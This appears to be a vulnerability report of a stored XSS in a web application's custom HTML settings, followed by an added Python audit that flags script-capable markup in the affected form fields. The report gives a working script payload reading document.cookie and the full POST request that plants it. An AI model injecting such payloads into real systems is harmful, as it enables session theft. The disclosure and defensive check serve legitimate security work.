I found an XSS vulnerability in the configuration/custom_html module.
It is in the functionality for adding custom HTML code through the CFG[CUSTOM_HTML_HEAD] and CFG[CUSTOM_HTML_BODY] parameters.
Payload: <script>alert('text'%2bdocument.cookie)</script>
Request:
POST /index.php?module=configuration/save&redirect_to=configuration/custom_html HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

form_session_token=DGIbpSzqgS&CFG[CUSTOM_HTML_HEAD]=<script>alert('head'%2bdocument.cookie)</script>&CFG[CUSTOM_HTML_BODY]=<script>alert('body'%2bdocument.cookie)</script>
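
A defender-side check for the request shown above, as an added example that is not part of the original post or the application's own code: it parses a form body and reports script-capable markup submitted in the two CFG fields named in the report, so such saves can be logged or held for review. The tag list, the class and function names, and the sample body (the report's body with the session token replaced by a placeholder) are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Fields named in the report above.
WATCHED_FIELDS = ("CFG[CUSTOM_HTML_HEAD]", "CFG[CUSTOM_HTML_BODY]")
# Assumption: tags treated as script-capable for this audit.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class ActiveMarkupFinder(HTMLParser):
    """Collects script-capable constructs found in an HTML fragment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lowercased from HTMLParser.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} on <{tag}>")


def audit_form_body(body):
    """Return {field: [findings]} for watched fields carrying active markup."""
    report = {}
    # parse_qsl percent-decodes names and values (%2b -> '+', %5B -> '[').
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field not in WATCHED_FIELDS:
            continue
        finder = ActiveMarkupFinder()
        finder.feed(value)
        finder.close()
        if finder.findings:
            report.setdefault(field, []).extend(finder.findings)
    return report


# Constructed sample: the body from the report, token replaced by a placeholder.
SAMPLE_BODY = (
    "form_session_token=PLACEHOLDER"
    "&CFG[CUSTOM_HTML_HEAD]=<script>alert('head'%2bdocument.cookie)</script>"
    "&CFG[CUSTOM_HTML_BODY]=<script>alert('body'%2bdocument.cookie)</script>"
)
```

An empty result means neither field carried markup from the audited categories; it does not replace output-side controls such as HttpOnly session cookies or a Content-Security-Policy.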